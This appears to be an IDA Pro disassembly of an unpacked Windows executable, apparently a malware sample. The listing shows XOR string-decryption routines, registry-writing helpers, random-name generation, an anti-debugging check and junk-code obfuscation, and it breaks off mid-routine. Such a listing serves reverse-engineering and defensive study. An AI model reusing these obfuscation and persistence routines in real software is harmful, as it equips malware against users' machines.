;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : DCC673C8157D6B9510525CAEBDC8990C
; File Name : u:\work\dcc673c8157d6b9510525caebdc8990c_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; DATA XREF: sub_401020+A�o
; sub_43EFE5+A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
xor eax, eax
inc eax
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
jz short locret_40101F
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40101F: ; CODE XREF: sub_401000+E�j
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401020 proc near ; CODE XREF: sub_40109A+BE�p
; sub_40109A+EC�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_40103D: ; CODE XREF: sub_401020+44�j
; sub_401020+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40106C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40106C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40103D
call dword ptr [ebx+esi*4+8]
jmp short loc_40103D
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401020+2A�j
; sub_401020+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_401020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107A proc near ; CODE XREF: sub_40109A+B1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_40C638 ; RtlUnwind
sub_40107A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401092 proc near ; DATA XREF: sub_40107A+B�o
; sub_43F03F+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401092 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40109A proc near ; DATA XREF: sub_401219+10�o
; sub_407F34+A�o ...
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov dword_43C08C, eax
mov dword_43C090, ebx
test dword ptr [eax+4], 6
jnz loc_40117F
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov dword_43C090, eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4010DD: ; CODE XREF: sub_40109A+DC�j
cmp esi, 0FFFFFFFFh
jz loc_40118E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40116D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov dword_43C030, eax
mov edx, [ebp+var_14]
mov eax, [edx]
mov dword_43C034, eax
mov eax, [edx+4]
mov dword_43C038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_43C03C
mov esi, dword_43C034
rep movsd
lea edi, dword_43C03C
mov dword_43C034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40116D
js short loc_40117B
mov edi, [ebx+8]
push ebx
call sub_40107A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_401020
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_40116D: ; CODE XREF: sub_40109A+54�j
; sub_40109A+A9�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4010DD
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_40109A+AB�j
xor eax, eax
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_40117F: ; CODE XREF: sub_40109A+23�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_401020
add esp, 0Ch
loc_40118E: ; CODE XREF: sub_40109A+46�j
push 0
mov dword_43C010, 0Bh
push 0Bh
call sub_40C9C8
add esp, 8
or eax, eax
jnz short loc_4011C9
push 0
mov dword_43C010, 8
push 8
call sub_40C9C8
add esp, 8
or eax, eax
jnz short loc_4011C9
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_40109A+10C�j
; sub_40109A+126�j
cmp eax, 0FFFFFFFFh
jz short loc_4011F8
push eax
push dword_43C010
call sub_40C9C8
add esp, 8
push dword_43C010
call sub_40C9B0
add esp, 4
mov eax, 1
loc_4011F0: ; CODE XREF: sub_40109A+E3�j
; sub_40109A+12D�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_40109A+132�j
cmp dword_43C02C, 0
jnz short loc_401208
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_401208: ; CODE XREF: sub_40109A+165�j
mov eax, dword_43C02C
push 0Bh
jmp eax
sub_40109A endp
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_4011F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401219 proc near ; CODE XREF: start+500�j
; DATA XREF: start:loc_44A4FC�o
var_30 = word ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C01C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push eax
fnstcw [esp+30h+var_30]
or [esp+30h+var_30], 300h
fldcw [esp+30h+var_30]
add esp, 4
push 0
push 0
push offset dword_43C028
push offset dword_43C024
push offset dword_43C020
call sub_40C950
push dword_43C028
push dword_43C024
push dword_43C020
mov dword_43C014, esp
call sub_40C3D8
add esp, 18h
xor ecx, ecx
mov [ebp+var_4], ecx
push eax
call sub_40C980
leave
retn
sub_401219 endp
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40129C proc near ; CODE XREF: sub_408EFF+18�p
; sub_408EFF+34�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43C09C
lea eax, ds:41B780h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_4012D8
; ---------------------------------------------------------------------------
loc_4012C1: ; CODE XREF: sub_40129C+3E�j
mov eax, dword_43C09C
add eax, edi
lea eax, ds:41B780h[eax]
movsx edx, byte ptr [eax]
xor edx, 5
mov [eax], dl
inc edi
loc_4012D8: ; CODE XREF: sub_40129C+23�j
cmp edi, esi
jl short loc_4012C1
mov eax, dword_43C09C
add eax, esi
mov byte ptr ds:dword_41B780[eax], 0
xor edi, edi
mov edi, dword_43C09C
add dword_43C09C, 3
mov eax, dword_43C09C
lea eax, [eax+esi+1]
mov dword_43C09C, eax
cmp eax, 0DB1h
jle short loc_401316
and dword_43C09C, 0
loc_401316: ; CODE XREF: sub_40129C+71�j
lea eax, dword_41B780[edi]
pop edi
pop esi
pop ebp
retn
sub_40129C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401320 proc near ; CODE XREF: sub_40815F+13A�p
var_14C1B = byte ptr -14C1Bh
var_14C14 = dword ptr -14C14h
var_14C0D = byte ptr -14C0Dh
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 14C1Ch
call sub_40C43C
push ebx
push esi
push edi
call sub_40C548 ; GetTickCount
lea edi, [ebp+var_14C1B]
lea esi, aLImn ; "l iMn "
mov ecx, 7
rep movsb
call sub_40C548 ; GetTickCount
push 0
push 0
push 3
push 0
push 0
push 80000000h
push offset dword_40F0A0
call sub_40C650 ; CreateFileA
mov [ebp+var_4], eax
mov [ebp+var_5], 0Eh
add [ebp+var_5], 1
cmp eax, 0FFFFFFFFh
jnz short loc_40137A
xor eax, eax
jmp short loc_4013E5
; ---------------------------------------------------------------------------
loc_40137A: ; CODE XREF: sub_401320+54�j
push 0
lea eax, [ebp+var_14C14]
push eax
push 14C08h
lea eax, [ebp+var_14C0D]
push eax
push [ebp+var_4]
call sub_40C62C ; ReadFile
push [ebp+var_4]
call sub_40C530 ; CloseHandle
call sub_40C554 ; GetVersion
xor ebx, ebx
loc_4013A6: ; CODE XREF: sub_401320+C1�j
mov eax, 10h
sub eax, dword_43C098
push eax
push offset byte_433F40
lea eax, [ebp+ebx+var_14C0D]
push eax
call sub_4017D2
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_4013D3
xor eax, eax
inc eax
jmp short loc_4013E5
; ---------------------------------------------------------------------------
loc_4013D3: ; CODE XREF: sub_401320+AC�j
call sub_40C4E8 ; RtlGetLastWin32Error
add ebx, 11h
cmp ebx, [ebp+var_14C14]
jb short loc_4013A6
xor eax, eax
loc_4013E5: ; CODE XREF: sub_401320+58�j
; sub_401320+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_401320 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 26h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C23C
lea eax, ds:41A780h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov dword ptr [ebp-8], 207h
xor edi, edi
jmp short loc_401437
; ---------------------------------------------------------------------------
loc_401420: ; CODE XREF: .text:00401439�j
mov eax, dword_43C23C
add eax, edi
lea eax, ds:41A780h[eax]
movsx edx, byte ptr [eax]
xor edx, 62h
mov [eax], dl
inc edi
loc_401437: ; CODE XREF: .text:0040141E�j
cmp edi, esi
jl short loc_401420
mov dword ptr [ebp-0Ch], 294h
mov eax, dword_43C23C
add eax, esi
mov byte ptr ds:dword_41A780[eax], 0
xor edi, edi
mov edi, dword_43C23C
mov eax, edi
add eax, 6
add eax, esi
mov dword_43C23C, eax
add dword_43C23C, 2
cmp dword_43C23C, 0DFCh
jle short loc_40147F
and dword_43C23C, 0
loc_40147F: ; CODE XREF: .text:00401476�j
mov dword ptr [ebp-10h], 158h
lea eax, dword_41A780[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401490 proc near ; CODE XREF: sub_4062A9+D0�p
; sub_408C55+80�p ...
var_8 = word ptr -8
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_40C4B8 ; GetCurrentProcessId
call sub_40C4E8 ; RtlGetLastWin32Error
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C8D8 ; RegOpenKeyExA
mov esi, eax
mov [ebp+var_5], 0D6h
add [ebp+var_5], 1
or esi, esi
jz short loc_4014C9
xor eax, eax
jmp short loc_40150B
; ---------------------------------------------------------------------------
loc_4014C9: ; CODE XREF: sub_401490+33�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_40C8E4 ; RegQueryValueExA
mov esi, eax
mov edi, 731Ah
mov eax, edi
add eax, edi
mov edi, eax
push [ebp+var_4]
call sub_40C8CC ; RegCloseKey
or esi, esi
jz short loc_4014FC
xor eax, eax
jmp short loc_40150B
; ---------------------------------------------------------------------------
loc_4014FC: ; CODE XREF: sub_401490+66�j
mov [ebp+var_8], 4744h
add [ebp+var_8], 0F28h
xor eax, eax
inc eax
loc_40150B: ; CODE XREF: sub_401490+37�j
; sub_401490+6A�j
pop edi
pop esi
leave
retn
sub_401490 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 45h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C248
lea eax, ds:4350C0h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov dword ptr [ebp-8], 230h
xor edi, edi
jmp short loc_40155E
; ---------------------------------------------------------------------------
loc_401544: ; CODE XREF: .text:00401560�j
mov eax, dword_43C248
add eax, edi
lea eax, ds:4350C0h[eax]
movsx edx, byte ptr [eax]
xor edx, 9Dh
mov [eax], dl
inc edi
loc_40155E: ; CODE XREF: .text:00401542�j
cmp edi, esi
jl short loc_401544
mov eax, dword_43C248
add eax, esi
mov byte ptr ds:dword_4350C0[eax], 0
mov edi, dword_43C248
add dword_43C248, 2
mov eax, dword_43C248
add eax, 3
add eax, esi
mov dword_43C248, eax
inc dword_43C248
cmp dword_43C248, 0DF4h
jle short loc_4015A6
and dword_43C248, 0
loc_4015A6: ; CODE XREF: .text:0040159D�j
lea eax, dword_4350C0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015B0 proc near ; CODE XREF: sub_405F5E+98�p
; sub_405F5E+C6�p ...
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov [ebp+var_1], 82h
add [ebp+var_1], 1
call sub_40C4B8 ; GetCurrentProcessId
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C8C0 ; RegCreateKeyExA
mov edi, eax
or edi, edi
jz short loc_4015EE
xor eax, eax
jmp short loc_40163D
; ---------------------------------------------------------------------------
loc_4015EE: ; CODE XREF: sub_4015B0+38�j
call sub_40C4B8 ; GetCurrentProcessId
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_8]
call sub_40C8F0 ; RegSetValueExA
mov edi, eax
call sub_40C518 ; GetProcessHeap
push [ebp+var_8]
call sub_40C8CC ; RegCloseKey
or edi, edi
jz short loc_401620
xor eax, eax
jmp short loc_40163D
; ---------------------------------------------------------------------------
loc_401620: ; CODE XREF: sub_4015B0+6A�j
mov [ebp+var_9], 58h
add [ebp+var_9], 1
cmp [ebp+var_10], 1
jnz short loc_401635
mov eax, 2
jmp short loc_40163D
; ---------------------------------------------------------------------------
loc_401635: ; CODE XREF: sub_4015B0+7C�j
call sub_40C4E8 ; RtlGetLastWin32Error
xor eax, eax
inc eax
loc_40163D: ; CODE XREF: sub_4015B0+3C�j
; sub_4015B0+6E�j ...
pop edi
leave
retn
sub_4015B0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 0FBh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C254
lea eax, ds:438260h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_401687
; ---------------------------------------------------------------------------
loc_40166D: ; CODE XREF: .text:00401689�j
mov eax, dword_43C254
add eax, edi
lea eax, ds:438260h[eax]
movsx edx, byte ptr [eax]
xor edx, 0C0h
mov [eax], dl
inc edi
loc_401687: ; CODE XREF: .text:0040166B�j
cmp edi, esi
jl short loc_40166D
mov eax, dword_43C254
add eax, esi
mov byte ptr ds:dword_438260[eax], 0
xor edi, edi
mov edi, dword_43C254
mov eax, edi
add eax, 6
add eax, esi
mov dword_43C254, eax
add dword_43C254, 3
cmp dword_43C254, 0DB0h
jle short loc_4016C8
and dword_43C254, 0
loc_4016C8: ; CODE XREF: .text:004016BF�j
lea eax, dword_438260[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4016D2 proc near ; CODE XREF: sub_405636+145�p
; sub_409883+8D�p ...
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C4E8 ; RtlGetLastWin32Error
mov [ebp+var_2], 0B1Ah
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
xor esi, esi
jmp short loc_40171E
; ---------------------------------------------------------------------------
loc_4016F9: ; CODE XREF: sub_4016D2+4F�j
call sub_40C9BC
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 61h
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_40171E: ; CODE XREF: sub_4016D2+25�j
cmp esi, [ebp+arg_4]
jl short loc_4016F9
mov eax, [ebp+arg_4]
mov byte ptr [ebx+eax], 0
mov eax, ebx
pop edi
pop esi
pop ebx
leave
retn
sub_4016D2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 202h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C260
lea eax, ds:42FC90h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov dword ptr [ebp-8], 3ADh
xor edi, edi
jmp short loc_401780
; ---------------------------------------------------------------------------
loc_401766: ; CODE XREF: .text:00401782�j
mov eax, dword_43C260
add eax, edi
lea eax, ds:42FC90h[eax]
movsx edx, byte ptr [eax]
xor edx, 0FDh
mov [eax], dl
inc edi
loc_401780: ; CODE XREF: .text:00401764�j
cmp edi, esi
jl short loc_401766
mov eax, dword_43C260
add eax, esi
mov byte ptr ds:dword_42FC90[eax], 0
mov edi, dword_43C260
add dword_43C260, 2
mov eax, dword_43C260
lea eax, [eax+esi+3]
mov dword_43C260, eax
add dword_43C260, 3
cmp dword_43C260, 0E05h
jle short loc_4017C8
and dword_43C260, 0
loc_4017C8: ; CODE XREF: .text:004017BF�j
lea eax, dword_42FC90[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017D2 proc near ; CODE XREF: sub_401320+9F�p
; sub_40538B+61�p ...
var_19 = dword ptr -19h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_F = byte ptr -0Fh
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_E], 5D42h
movzx eax, [ebp+var_E]
imul eax, 1E96h
mov [ebp+var_E], ax
and [ebp+var_C], 0
call sub_40C548 ; GetTickCount
and [ebp+var_8], 0
jmp loc_4018A2
; ---------------------------------------------------------------------------
loc_401801: ; CODE XREF: sub_4017D2+E2�j
lea edi, [ebp+var_F]
lea esi, byte_43C264
xor ecx, ecx
inc ecx
rep movsb
and [ebp+var_4], 0
xor ebx, ebx
jmp short loc_401888
; ---------------------------------------------------------------------------
loc_401817: ; CODE XREF: sub_4017D2+C7�j
call sub_40C4E8 ; RtlGetLastWin32Error
mov eax, [ebp+var_8]
add eax, ebx
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+ebx]
cmp eax, edx
jnz short loc_401836
inc [ebp+var_4]
loc_401836: ; CODE XREF: sub_4017D2+5F�j
call sub_40C518 ; GetProcessHeap
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_401843: ; CODE XREF: sub_4017D2+76�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_401843
cmp [ebp+var_4], eax
jnz short loc_401887
lea edi, [ebp+var_14]
lea esi, aDJy ; "D Jy"
mov ecx, 5
rep movsb
inc [ebp+var_C]
lea edi, [ebp+var_15]
lea esi, byte_43C26A
mov ecx, 1
rep movsb
mov eax, [ebp+arg_8]
cmp [ebp+var_C], eax
jnz short loc_40187F
mov eax, [ebp+var_8]
jmp short loc_4018BF
; ---------------------------------------------------------------------------
loc_40187F: ; CODE XREF: sub_4017D2+A6�j
mov eax, dword_43C26B
mov [ebp+var_19], eax
loc_401887: ; CODE XREF: sub_4017D2+7B�j
inc ebx
loc_401888: ; CODE XREF: sub_4017D2+43�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_401890: ; CODE XREF: sub_4017D2+C3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_401890
cmp ebx, eax
jb loc_401817
inc [ebp+var_8]
loc_4018A2: ; CODE XREF: sub_4017D2+2A�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018AA: ; CODE XREF: sub_4017D2+DD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018AA
cmp [ebp+var_8], eax
jb loc_401801
mov eax, 0FFFFh
loc_4018BF: ; CODE XREF: sub_4017D2+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_4017D2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 0FBh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C278
lea eax, ds:416550h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_40190B
; ---------------------------------------------------------------------------
loc_4018F1: ; CODE XREF: .text:0040190D�j
mov eax, dword_43C278
add eax, edi
lea eax, ds:416550h[eax]
movsx edx, byte ptr [eax]
xor edx, 0C0h
mov [eax], dl
inc edi
loc_40190B: ; CODE XREF: .text:004018EF�j
cmp edi, esi
jl short loc_4018F1
mov eax, dword_43C278
add eax, esi
mov byte ptr ds:dword_416550[eax], 0
xor edi, edi
mov edi, dword_43C278
mov eax, edi
add eax, 6
add eax, esi
mov dword_43C278, eax
add dword_43C278, 3
cmp dword_43C278, 0DB0h
jle short loc_40194C
and dword_43C278, 0
loc_40194C: ; CODE XREF: .text:00401943�j
lea eax, dword_416550[edi]
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+10h]
mov ebx, [ebp+14h]
call sub_40C4E8 ; RtlGetLastWin32Error
mov word ptr [ebp-2], 0B1Ah
movzx eax, word ptr [ebp-2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-2], ax
mov edi, esi
jmp short loc_40199C
; ---------------------------------------------------------------------------
loc_401980: ; CODE XREF: .text:0040199E�j
mov eax, [ebp+8]
movsx eax, byte ptr [eax+edi]
mov edx, edi
sub edx, esi
mov ecx, [ebp+0Ch]
movsx edx, byte ptr [ecx+edx]
cmp eax, edx
jz short loc_40199B
xor eax, eax
inc eax
jmp short loc_4019A2
; ---------------------------------------------------------------------------
loc_40199B: ; CODE XREF: .text:00401994�j
inc edi
loc_40199C: ; CODE XREF: .text:0040197E�j
cmp edi, ebx
jl short loc_401980
xor eax, eax
loc_4019A2: ; CODE XREF: .text:00401999�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 5Bh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C284
lea eax, ds:434040h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_4019F0
; ---------------------------------------------------------------------------
loc_4019D6: ; CODE XREF: .text:004019F2�j
mov eax, dword_43C284
add eax, edi
lea eax, ds:434040h[eax]
movsx edx, byte ptr [eax]
xor edx, 0A3h
mov [eax], dl
inc edi
loc_4019F0: ; CODE XREF: .text:004019D4�j
cmp edi, esi
jl short loc_4019D6
mov dword ptr [ebp-8], 3ABh
mov eax, dword_43C284
add eax, esi
mov byte ptr ds:dword_434040[eax], 0
mov edi, dword_43C284
inc dword_43C284
mov eax, dword_43C284
lea eax, [eax+esi+2]
mov dword_43C284, eax
cmp eax, 0DDFh
jle short loc_401A32
and dword_43C284, 0
loc_401A32: ; CODE XREF: .text:00401A29�j
mov dword ptr [ebp-0Ch], 2C2h
lea eax, dword_434040[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A43 proc near ; CODE XREF: sub_405636+45�p
; sub_4062A9+458�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_40C518 ; GetProcessHeap
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call sub_40C650 ; CreateFileA
mov edi, eax
mov esi, 3784h
add esi, 109Bh
cmp edi, 0FFFFFFFFh
jnz short loc_401AA2
mov [ebp+var_8], 6F30h
mov eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov [ebp+var_8], edx
cmp [ebp+arg_4], 0
jz short loc_401A99
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_401A99: ; CODE XREF: sub_401A43+4E�j
call sub_40C4B8 ; GetCurrentProcessId
xor eax, eax
jmp short loc_401AF1
; ---------------------------------------------------------------------------
loc_401AA2: ; CODE XREF: sub_401A43+37�j
push 0
push edi
call sub_40C4D0 ; GetFileSize
mov ebx, eax
add eax, 10h
push eax
push 40h
call sub_40C5FC ; LocalAlloc
mov esi, eax
call sub_40C4B8 ; GetCurrentProcessId
push 0
cmp [ebp+arg_4], 0
jz short loc_401ACE
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_401AD4
; ---------------------------------------------------------------------------
loc_401ACE: ; CODE XREF: sub_401A43+81�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_401AD4: ; CODE XREF: sub_401A43+89�j
push [ebp+var_8]
push ebx
push esi
push edi
call sub_40C62C ; ReadFile
call sub_40C5D8 ; IsDebuggerPresent
push edi
call sub_40C530 ; CloseHandle
call sub_40C518 ; GetProcessHeap
mov eax, esi
loc_401AF1: ; CODE XREF: sub_401A43+5D�j
pop edi
pop esi
pop ebx
leave
retn
sub_401A43 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 163h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C290
lea eax, ds:410640h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_401B3D
; ---------------------------------------------------------------------------
loc_401B23: ; CODE XREF: .text:00401B3F�j
mov eax, dword_43C290
add eax, edi
lea eax, ds:410640h[eax]
movsx edx, byte ptr [eax]
xor edx, 0E0h
mov [eax], dl
inc edi
loc_401B3D: ; CODE XREF: .text:00401B21�j
cmp edi, esi
jl short loc_401B23
mov eax, dword_43C290
add eax, esi
mov byte ptr ds:dword_410640[eax], 0
mov edi, dword_43C290
add dword_43C290, 2
mov eax, dword_43C290
lea eax, [eax+esi+6]
mov dword_43C290, eax
cmp eax, 0DF7h
jle short loc_401B79
and dword_43C290, 0
loc_401B79: ; CODE XREF: .text:00401B70�j
lea eax, dword_410640[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B83 proc near ; CODE XREF: sub_405636+675�p
; sub_409883+D17�p
var_10 = byte ptr -10h
var_D = byte ptr -0Dh
